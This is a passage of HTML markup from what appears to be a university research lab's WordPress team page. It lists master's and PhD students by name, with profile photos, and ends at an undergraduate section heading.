class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c108 position-relative h-element\" data-colibri-id=\"182-c108\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-830 style-608-image style-local-182-c108-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c108-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c109 position-relative\" data-colibri-id=\"182-c109\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c110-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c110 position-relative\" data-colibri-id=\"182-c110\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c111 position-relative h-element\" data-colibri-id=\"182-c111\">\n<div class=\"h-heading__outer style-611 style-local-182-c111\">\n<h4 class=\"\">Brindal Dhol</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c112 position-relative h-element\" data-colibri-id=\"182-c112\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c113 position-relative h-element\" data-colibri-id=\"182-c113\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c114-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c114 position-relative\" data-colibri-id=\"182-c114\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c115 position-relative h-element\" data-colibri-id=\"182-c115\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-831 style-608-image style-local-182-c115-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c115-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c116 position-relative\" data-colibri-id=\"182-c116\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c117-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c117 position-relative\" data-colibri-id=\"182-c117\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c118 position-relative h-element\" data-colibri-id=\"182-c118\">\n<div class=\"h-heading__outer style-611 style-local-182-c118\">\n<h4 class=\"\">Vineeth Kumar Chandha</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c119 position-relative h-element\" data-colibri-id=\"182-c119\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c120 position-relative h-element\" data-colibri-id=\"182-c120\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c121-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c121 position-relative\" data-colibri-id=\"182-c121\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c122 position-relative h-element\" data-colibri-id=\"182-c122\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-863 style-608-image style-local-182-c122-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c122-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c123 position-relative\" data-colibri-id=\"182-c123\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c124-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c124 position-relative\" data-colibri-id=\"182-c124\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c125 position-relative h-element\" data-colibri-id=\"182-c125\">\n<div class=\"h-heading__outer style-611 style-local-182-c125\">\n<h4 class=\"\">Ardavan Sassini</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c126 position-relative h-element\" data-colibri-id=\"182-c126\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c127 position-relative h-element\" data-colibri-id=\"182-c127\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c128-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c128 position-relative\" data-colibri-id=\"182-c128\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c129 position-relative h-element\" data-colibri-id=\"182-c129\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-884 style-608-image style-local-182-c129-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c129-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c130 position-relative\" data-colibri-id=\"182-c130\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c131-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c131 position-relative\" data-colibri-id=\"182-c131\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c132 position-relative h-element\" data-colibri-id=\"182-c132\">\n<div class=\"h-heading__outer style-611 style-local-182-c132\">\n<h4 class=\"\">Alex Asige</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c133 position-relative h-element\" data-colibri-id=\"182-c133\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c134 position-relative h-element\" data-colibri-id=\"182-c134\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Socicon (http://www.socicon.com)-->\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c135-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c135 position-relative\" data-colibri-id=\"182-c135\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c136 position-relative h-element\" data-colibri-id=\"182-c136\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-874 style-608-image style-local-182-c136-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c136-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c137 position-relative\" data-colibri-id=\"182-c137\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c138-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c138 position-relative\" data-colibri-id=\"182-c138\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c139 position-relative h-element\" data-colibri-id=\"182-c139\">\n<div class=\"h-heading__outer style-611 style-local-182-c139\">\n<h4 class=\"\">Angelique Willis</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c140 position-relative h-element\" data-colibri-id=\"182-c140\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c141 position-relative h-element\" data-colibri-id=\"182-c141\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c142-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c142 position-relative\" data-colibri-id=\"182-c142\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c143 position-relative h-element\" data-colibri-id=\"182-c143\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-966 style-608-image style-local-182-c143-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c143-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c144 position-relative\" data-colibri-id=\"182-c144\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c145-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c145 position-relative\" data-colibri-id=\"182-c145\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c146 position-relative h-element\" data-colibri-id=\"182-c146\">\n<div class=\"h-heading__outer style-611 style-local-182-c146\">\n<h4 class=\"\">Emma McDaniel</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c147 position-relative h-element\" data-colibri-id=\"182-c147\">\n<div class=\"\">\n\nPhD student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c148 position-relative h-element\" data-colibri-id=\"182-c148\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c149-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c149 position-relative\" data-colibri-id=\"182-c149\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c150 position-relative h-element\" data-colibri-id=\"182-c150\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1007 style-608-image style-local-182-c150-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c150-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c151 position-relative\" data-colibri-id=\"182-c151\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c152-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c152 position-relative\" data-colibri-id=\"182-c152\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c153 position-relative h-element\" data-colibri-id=\"182-c153\">\n<div class=\"h-heading__outer style-611 style-local-182-c153\">\n<h4 class=\"\">Sathwik Chowda</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c154 position-relative h-element\" data-colibri-id=\"182-c154\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c155 position-relative h-element\" data-colibri-id=\"182-c155\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c156-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c156 position-relative\" data-colibri-id=\"182-c156\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c157 position-relative h-element\" data-colibri-id=\"182-c157\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1094 style-608-image style-local-182-c157-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c157-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c158 position-relative\" data-colibri-id=\"182-c158\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c159-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c159 position-relative\" data-colibri-id=\"182-c159\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c160 position-relative h-element\" data-colibri-id=\"182-c160\">\n<div class=\"h-heading__outer style-611 style-local-182-c160\">\n<h4 class=\"\">Jean Guo</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c161 position-relative h-element\" data-colibri-id=\"182-c161\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c162-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c162 position-relative\" data-colibri-id=\"182-c162\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c163 position-relative h-element\" data-colibri-id=\"182-c163\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1336 style-608-image style-local-182-c163-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c163-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c164 position-relative\" data-colibri-id=\"182-c164\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c165-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c165 position-relative\" data-colibri-id=\"182-c165\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c166 position-relative h-element\" data-colibri-id=\"182-c166\">\n<div class=\"h-heading__outer style-611 style-local-182-c166\">\n<h4 class=\"\">Aaja Christie</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c167 position-relative h-element\" data-colibri-id=\"182-c167\">\n<div class=\"\">\n\nPhD student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c168 position-relative h-element\" data-colibri-id=\"182-c168\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-701 style-local-182-c223 position-relative\" data-colibri-id=\"182-c223\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-702-outer style-local-182-c224-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-702 style-local-182-c224 position-relative\" data-colibri-id=\"182-c224\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-707 style-local-182-c229 position-relative h-element\" data-colibri-id=\"182-c229\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1372 style-707-image style-local-182-c229-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/cropped-cropped-bayo.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-707-frameImage style-local-182-c229-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-global-transition-all h-heading style-704 style-local-182-c226 position-relative h-element\" data-colibri-id=\"182-c226\">\n<div class=\"h-heading__outer style-704 style-local-182-c226\">\n<h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-710 style-local-182-c231 position-relative h-element\" data-colibri-id=\"182-c231\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-709 style-local-182-c230 position-relative h-element\" data-colibri-id=\"182-c230\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Socicon (http://www.socicon.com)-->\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-703-outer style-local-182-c225-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-703 style-local-182-c225 position-relative\" data-colibri-id=\"182-c225\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div id=\"team-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-626 style-local-182-c172 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c172\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-638 style-local-182-c209 position-relative\" data-colibri-id=\"182-c209\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-639-outer style-local-182-c210-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-639 style-local-182-c210 position-relative\" data-colibri-id=\"182-c210\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-640 style-local-182-c211 position-relative h-element\" data-colibri-id=\"182-c211\">\n<div class=\"h-heading__outer style-640 style-local-182-c211\">\n<h2 class=\"\">Undergraduate Students</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 